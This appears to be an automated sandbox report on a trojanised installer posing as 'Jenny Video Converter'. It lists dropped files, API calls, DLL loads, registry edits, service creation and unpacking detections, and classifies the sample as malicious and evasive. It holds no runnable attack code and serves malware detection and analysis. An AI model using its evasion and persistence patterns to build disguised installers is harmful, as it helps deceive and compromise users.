        Source: N6jsQ3XNNX.exe, 00000000.00000002.3336120591.0000000002088000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.exe, 00000000.00000003.2095937284.0000000002310000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000003.2098858266.0000000002170000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3336768727.0000000002160000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3336281247.000000000073E000.00000004.00000020.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000003.2098757251.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://fsf.org/
        Source: is-73S5T.tmp.2.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
        Source: is-7MVDI.tmp.2.drString found in binary or memory: http://tukaani.org/
        Source: is-7MVDI.tmp.2.drString found in binary or memory: http://tukaani.org/xz/
        Source: N6jsQ3XNNX.exe, 00000000.00000002.3336120591.0000000002088000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.exe, 00000000.00000003.2095937284.0000000002310000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000003.2098858266.0000000002170000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3336768727.0000000002160000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3336281247.000000000073E000.00000004.00000020.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000003.2098757251.0000000003180000.00000004.00001000.00020000.00000000.sdmp, is-DDT59.tmp.2.drString found in binary or memory: http://www.gnu.org/licenses/
        Source: N6jsQ3XNNX.tmp, N6jsQ3XNNX.tmp, 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-SAKD7.tmp.2.dr, N6jsQ3XNNX.tmp.0.drString found in binary or memory: http://www.innosetup.com/
        Source: N6jsQ3XNNX.exe, 00000000.00000003.2096777712.0000000002094000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.exe, 00000000.00000003.2096528597.0000000002310000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, N6jsQ3XNNX.tmp, 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-SAKD7.tmp.2.dr, N6jsQ3XNNX.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
        Source: N6jsQ3XNNX.exe, 00000000.00000003.2096777712.0000000002094000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.exe, 00000000.00000003.2096528597.0000000002310000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-SAKD7.tmp.2.dr, N6jsQ3XNNX.tmp.0.drString found in binary or memory: http://www.remobjects.com/psU

        System Summary

        barindex
        PE file has a writeable .text section
        Source: jennyvideoconverter32_64.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: ET Ammeter Side 10.7.45.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0042F530 NtdllDefWindowProc_A,2_2_0042F530
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00423B94 NtdllDefWindowProc_A,2_2_00423B94
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004125E8 NtdllDefWindowProc_A,2_2_004125E8
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004789DC NtdllDefWindowProc_A,2_2_004789DC
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004573CC PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,2_2_004573CC
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,2_2_0042E944
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_2_004555D0
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_0040840C0_2_0040840C
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004804C62_2_004804C6
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004709502_2_00470950
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004352D82_2_004352D8
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004677102_2_00467710
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0043036C2_2_0043036C
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004444D82_2_004444D8
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004345D42_2_004345D4
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004866042_2_00486604
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00444A802_2_00444A80
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00430EF82_2_00430EF8
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004451782_2_00445178
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0045F4302_2_0045F430
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0045B4D82_2_0045B4D8
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004875642_2_00487564
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004455842_2_00445584
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004697702_2_00469770
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0048D8C42_2_0048D8C4
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004519A82_2_004519A8
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0043DD602_2_0043DD60
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_004010513_2_00401051
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_00401C263_2_00401C26
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02DBE0023_2_02DBE002
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02DBBCEB3_2_02DBBCEB
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02DBB4E53_2_02DBB4E5
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02DBBD583_2_02DBBD58
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02DA53A03_2_02DA53A0
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D9E18D3_2_02D9E18D
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D99E843_2_02D99E84
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02DA4E293_2_02DA4E29
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D8EFAD3_2_02D8EFAD
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D9DC993_2_02D9DC99
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D984423_2_02D98442
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D9AC3A3_2_02D9AC3A
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02DA2DB43_2_02DA2DB4
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D9E5A53_2_02D9E5A5
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp 25252B18CE0D80B360A6DE95C8B31E32EFD8034199F65BF01E3612BD94ABC63E
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: String function: 02DA5330 appears 139 times
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: String function: 02D98AE0 appears 37 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00405964 appears 116 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00408C14 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00406ACC appears 41 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00403400 appears 61 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00445DE4 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 004078FC appears 43 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 004344EC appears 32 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00403494 appears 82 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00457D58 appears 73 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00453330 appears 93 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00457B4C appears 98 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00403684 appears 221 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 004460B4 appears 59 times
        Source: N6jsQ3XNNX.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: N6jsQ3XNNX.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: N6jsQ3XNNX.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: N6jsQ3XNNX.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: N6jsQ3XNNX.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-SAKD7.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: is-SAKD7.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: is-SAKD7.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: is-SAKD7.tmp.2.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-FABCG.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-8J8L1.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-73S5T.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-GR40U.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-IR87B.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-S9SIF.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-CCK3H.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-7MVDI.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-DDT59.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-KK58F.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-D0HIN.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: N6jsQ3XNNX.exe, 00000000.00000003.2096777712.0000000002094000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs N6jsQ3XNNX.exe
        Source: N6jsQ3XNNX.exe, 00000000.00000003.2096528597.0000000002310000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs N6jsQ3XNNX.exe
        Source: N6jsQ3XNNX.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: _RegDLL.tmp.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.evad.winEXE@6/69@2/3
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D908B8 FormatMessageA,GetLastError,3_2_02D908B8
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_2_004555D0
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00455DF8 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,2_2_00455DF8
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: CreateServiceA,3_2_004027A0
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0046E38C GetVersion,CoCreateInstance,2_2_0046E38C
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409BEC
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_004027BE StartServiceCtrlDispatcherA,3_2_004027BE
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_004027BE StartServiceCtrlDispatcherA,3_2_004027BE
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video ConverterJump to behavior
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeFile created: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile read: C:\Windows\win.iniJump to behavior
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: N6jsQ3XNNX.exeVirustotal: Detection: 27%
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeFile read: C:\Users\user\Desktop\N6jsQ3XNNX.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\N6jsQ3XNNX.exe "C:\Users\user\Desktop\N6jsQ3XNNX.exe"
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeProcess created: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp "C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp" /SL5="$203BE,4230882,54272,C:\Users\user\Desktop\N6jsQ3XNNX.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpProcess created: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe "C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe" -i
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeProcess created: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp "C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp" /SL5="$203BE,4230882,54272,C:\Users\user\Desktop\N6jsQ3XNNX.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpProcess created: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe "C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe" -iJump to behavior
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: rstrtmgr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: explorerframe.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: dsound.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpWindow found: window name: TMainFormJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Jenny Video Converter_is1Jump to behavior
        Source: N6jsQ3XNNX.exeStatic file information: File size 4512180 > 1048576

        Data Obfuscation

        barindex
        Detected unpacking (changes PE section rights)
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeUnpacked PE file: 3.2.jennyvideoconverter32_64.exe.400000.0.unpack .text:EW;.rdata:R;_cde_2:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Detected unpacking (overwrites its own PE header)
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeUnpacked PE file: 3.2.jennyvideoconverter32_64.exe.400000.0.unpack
        Source: is-E27ND.tmp.2.drStatic PE information: 0x8C00008C [Mon Jun 6 07:19:40 2044 UTC]
